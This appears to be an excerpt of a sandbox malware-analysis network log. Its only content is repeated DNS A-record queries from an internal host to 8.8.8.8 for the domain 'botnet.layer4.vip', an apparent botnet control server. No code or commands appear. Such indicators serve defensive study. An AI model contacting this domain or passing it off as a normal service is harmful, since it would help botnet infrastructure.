                                  Apr 9, 2023 03:31:43.379914999 CEST192.168.2.238.8.8.80x75f1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.395795107 CEST192.168.2.238.8.8.80xf181Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.420171976 CEST192.168.2.238.8.8.80xf181Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.444278955 CEST192.168.2.238.8.8.80xf181Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.459795952 CEST192.168.2.238.8.8.80xf181Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.484165907 CEST192.168.2.238.8.8.80xf181Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.499779940 CEST192.168.2.238.8.8.80x45dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.515481949 CEST192.168.2.238.8.8.80x45dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.531085968 CEST192.168.2.238.8.8.80x45dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.546927929 CEST192.168.2.238.8.8.80x45dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.571331024 CEST192.168.2.238.8.8.80x45dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.586935997 CEST192.168.2.238.8.8.80x6a45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.610990047 CEST192.168.2.238.8.8.80x6a45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.635021925 CEST192.168.2.238.8.8.80x6a45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.650948048 CEST192.168.2.238.8.8.80x6a45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.666774988 CEST192.168.2.238.8.8.80x6a45Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.682430029 CEST192.168.2.238.8.8.80x3d1aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.709738016 CEST192.168.2.238.8.8.80x3d1aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.734215021 CEST192.168.2.238.8.8.80x3d1aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.749742031 CEST192.168.2.238.8.8.80x3d1aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.774188995 CEST192.168.2.238.8.8.80x3d1aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.789741039 CEST192.168.2.238.8.8.80x9afbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.805264950 CEST192.168.2.238.8.8.80x9afbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.829420090 CEST192.168.2.238.8.8.80x9afbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.845460892 CEST192.168.2.238.8.8.80x9afbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.869679928 CEST192.168.2.238.8.8.80x9afbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.885519028 CEST192.168.2.238.8.8.80x945fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.909883022 CEST192.168.2.238.8.8.80x945fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.934670925 CEST192.168.2.238.8.8.80x945fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.950108051 CEST192.168.2.238.8.8.80x945fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.966053963 CEST192.168.2.238.8.8.80x945fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:43.990613937 CEST192.168.2.238.8.8.80xbfc9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.015254974 CEST192.168.2.238.8.8.80xbfc9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.039695978 CEST192.168.2.238.8.8.80xbfc9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.063968897 CEST192.168.2.238.8.8.80xbfc9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.079502106 CEST192.168.2.238.8.8.80xbfc9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.095469952 CEST192.168.2.238.8.8.80x4b3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.120071888 CEST192.168.2.238.8.8.80x4b3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.136051893 CEST192.168.2.238.8.8.80x4b3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.151738882 CEST192.168.2.238.8.8.80x4b3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.176078081 CEST192.168.2.238.8.8.80x4b3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.192130089 CEST192.168.2.238.8.8.80xa5d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.208070040 CEST192.168.2.238.8.8.80xa5d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.223977089 CEST192.168.2.238.8.8.80xa5d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.248106003 CEST192.168.2.238.8.8.80xa5d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.272305012 CEST192.168.2.238.8.8.80xa5d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.296880007 CEST192.168.2.238.8.8.80x59beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.321487904 CEST192.168.2.238.8.8.80x59beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.337433100 CEST192.168.2.238.8.8.80x59beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.361617088 CEST192.168.2.238.8.8.80x59beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.377140999 CEST192.168.2.238.8.8.80x59beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.393007994 CEST192.168.2.238.8.8.80xd4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.408785105 CEST192.168.2.238.8.8.80xd4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.424222946 CEST192.168.2.238.8.8.80xd4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.448627949 CEST192.168.2.238.8.8.80xd4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.472997904 CEST192.168.2.238.8.8.80xd4c3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.488810062 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.504626989 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.520195961 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.536015987 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.551877975 CEST192.168.2.238.8.8.80x4e28Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.567759037 CEST192.168.2.238.8.8.80xf19cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.592113018 CEST192.168.2.238.8.8.80xf19cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.607690096 CEST192.168.2.238.8.8.80xf19cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.632102013 CEST192.168.2.238.8.8.80xf19cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.647578955 CEST192.168.2.238.8.8.80xf19cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.672094107 CEST192.168.2.238.8.8.80x97b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.687907934 CEST192.168.2.238.8.8.80x97b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.712286949 CEST192.168.2.238.8.8.80x97b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.728230953 CEST192.168.2.238.8.8.80x97b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.752629995 CEST192.168.2.238.8.8.80x97b9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.768193960 CEST192.168.2.238.8.8.80xb6b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.792254925 CEST192.168.2.238.8.8.80xb6b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.807760000 CEST192.168.2.238.8.8.80xb6b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.831851959 CEST192.168.2.238.8.8.80xb6b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.856203079 CEST192.168.2.238.8.8.80xb6b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.880361080 CEST192.168.2.238.8.8.80x38e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.895864010 CEST192.168.2.238.8.8.80x38e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.911729097 CEST192.168.2.238.8.8.80x38e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.927315950 CEST192.168.2.238.8.8.80x38e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.942832947 CEST192.168.2.238.8.8.80x38e6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.958726883 CEST192.168.2.238.8.8.80xa635Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:44.983251095 CEST192.168.2.238.8.8.80xa635Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.007586002 CEST192.168.2.238.8.8.80xa635Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.023462057 CEST192.168.2.238.8.8.80xa635Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.048019886 CEST192.168.2.238.8.8.80xa635Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.064215899 CEST192.168.2.238.8.8.80x3fb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.080214977 CEST192.168.2.238.8.8.80x3fb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.104744911 CEST192.168.2.238.8.8.80x3fb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.120747089 CEST192.168.2.238.8.8.80x3fb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.144984007 CEST192.168.2.238.8.8.80x3fb8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.169281006 CEST192.168.2.238.8.8.80xdacfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.184883118 CEST192.168.2.238.8.8.80xdacfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.209435940 CEST192.168.2.238.8.8.80xdacfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.225343943 CEST192.168.2.238.8.8.80xdacfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.249845028 CEST192.168.2.238.8.8.80xdacfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.274583101 CEST192.168.2.238.8.8.80x648aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.290546894 CEST192.168.2.238.8.8.80x648aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.306170940 CEST192.168.2.238.8.8.80x648aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.322218895 CEST192.168.2.238.8.8.80x648aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.346412897 CEST192.168.2.238.8.8.80x648aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.371144056 CEST192.168.2.238.8.8.80xd9c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.386940002 CEST192.168.2.238.8.8.80xd9c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.402825117 CEST192.168.2.238.8.8.80xd9c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.420600891 CEST192.168.2.238.8.8.80xd9c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.445229053 CEST192.168.2.238.8.8.80xd9c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.469618082 CEST192.168.2.238.8.8.80xce4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.493902922 CEST192.168.2.238.8.8.80xce4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.509572029 CEST192.168.2.238.8.8.80xce4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.533982992 CEST192.168.2.238.8.8.80xce4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.558501959 CEST192.168.2.238.8.8.80xce4bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.574418068 CEST192.168.2.238.8.8.80x6ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.598534107 CEST192.168.2.238.8.8.80x6ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.614042997 CEST192.168.2.238.8.8.80x6ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.638067961 CEST192.168.2.238.8.8.80x6ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.662483931 CEST192.168.2.238.8.8.80x6ccStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.686626911 CEST192.168.2.238.8.8.80xd569Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.708168983 CEST192.168.2.238.8.8.80xd569Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.732245922 CEST192.168.2.238.8.8.80xd569Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.748125076 CEST192.168.2.238.8.8.80xd569Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.772567034 CEST192.168.2.238.8.8.80xd569Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.788472891 CEST192.168.2.238.8.8.80x14a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.803963900 CEST192.168.2.238.8.8.80x14a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.819780111 CEST192.168.2.238.8.8.80x14a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.844196081 CEST192.168.2.238.8.8.80x14a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.859920025 CEST192.168.2.238.8.8.80x14a6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.876123905 CEST192.168.2.238.8.8.80x4225Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.900448084 CEST192.168.2.238.8.8.80x4225Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.924863100 CEST192.168.2.238.8.8.80x4225Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.940509081 CEST192.168.2.238.8.8.80x4225Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.964957952 CEST192.168.2.238.8.8.80x4225Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:45.989574909 CEST192.168.2.238.8.8.80xae18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.006182909 CEST192.168.2.238.8.8.80xae18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.021807909 CEST192.168.2.238.8.8.80xae18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.037832975 CEST192.168.2.238.8.8.80xae18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.053757906 CEST192.168.2.238.8.8.80xae18Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.069793940 CEST192.168.2.238.8.8.80xd753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.085906029 CEST192.168.2.238.8.8.80xd753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.101913929 CEST192.168.2.238.8.8.80xd753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.125885010 CEST192.168.2.238.8.8.80xd753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.151917934 CEST192.168.2.238.8.8.80xd753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.176295042 CEST192.168.2.238.8.8.80xf48eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.191936970 CEST192.168.2.238.8.8.80xf48eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.207416058 CEST192.168.2.238.8.8.80xf48eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.231400013 CEST192.168.2.238.8.8.80xf48eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.247024059 CEST192.168.2.238.8.8.80xf48eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.262638092 CEST192.168.2.238.8.8.80xf3d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.286708117 CEST192.168.2.238.8.8.80xf3d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.302439928 CEST192.168.2.238.8.8.80xf3d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.326814890 CEST192.168.2.238.8.8.80xf3d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.351125956 CEST192.168.2.238.8.8.80xf3d2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.375410080 CEST192.168.2.238.8.8.80xe118Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.399456024 CEST192.168.2.238.8.8.80xe118Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.423479080 CEST192.168.2.238.8.8.80xe118Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.439292908 CEST192.168.2.238.8.8.80xe118Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.455003023 CEST192.168.2.238.8.8.80xe118Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.470510960 CEST192.168.2.238.8.8.80x510Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.486416101 CEST192.168.2.238.8.8.80x510Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.510766983 CEST192.168.2.238.8.8.80x510Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.526216984 CEST192.168.2.238.8.8.80x510Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.542087078 CEST192.168.2.238.8.8.80x510Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.566317081 CEST192.168.2.238.8.8.80x3c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.590627909 CEST192.168.2.238.8.8.80x3c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.606045008 CEST192.168.2.238.8.8.80x3c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.621803999 CEST192.168.2.238.8.8.80x3c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.637531996 CEST192.168.2.238.8.8.80x3c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.653000116 CEST192.168.2.238.8.8.80x1650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.677489042 CEST192.168.2.238.8.8.80x1650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.707906961 CEST192.168.2.238.8.8.80x1650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.723640919 CEST192.168.2.238.8.8.80x1650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.739377022 CEST192.168.2.238.8.8.80x1650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.755413055 CEST192.168.2.238.8.8.80xa7c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.771435976 CEST192.168.2.238.8.8.80xa7c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.786956072 CEST192.168.2.238.8.8.80xa7c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.802567005 CEST192.168.2.238.8.8.80xa7c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.818093061 CEST192.168.2.238.8.8.80xa7c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.833957911 CEST192.168.2.238.8.8.80x6c3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.849559069 CEST192.168.2.238.8.8.80x6c3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.873908997 CEST192.168.2.238.8.8.80x6c3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.889735937 CEST192.168.2.238.8.8.80x6c3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.905513048 CEST192.168.2.238.8.8.80x6c3eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.921463013 CEST192.168.2.238.8.8.80x3f79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.945799112 CEST192.168.2.238.8.8.80x3f79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.970235109 CEST192.168.2.238.8.8.80x3f79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:46.985740900 CEST192.168.2.238.8.8.80x3f79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.001377106 CEST192.168.2.238.8.8.80x3f79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.025774002 CEST192.168.2.238.8.8.80x3389Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.049789906 CEST192.168.2.238.8.8.80x3389Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.073878050 CEST192.168.2.238.8.8.80x3389Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.098541975 CEST192.168.2.238.8.8.80x3389Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.113955021 CEST192.168.2.238.8.8.80x3389Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.130088091 CEST192.168.2.238.8.8.80x6c3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.154187918 CEST192.168.2.238.8.8.80x6c3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.178728104 CEST192.168.2.238.8.8.80x6c3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.203269958 CEST192.168.2.238.8.8.80x6c3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.227802992 CEST192.168.2.238.8.8.80x6c3cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:47.252285004 CEST192.168.2.238.8.8.80xac04Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
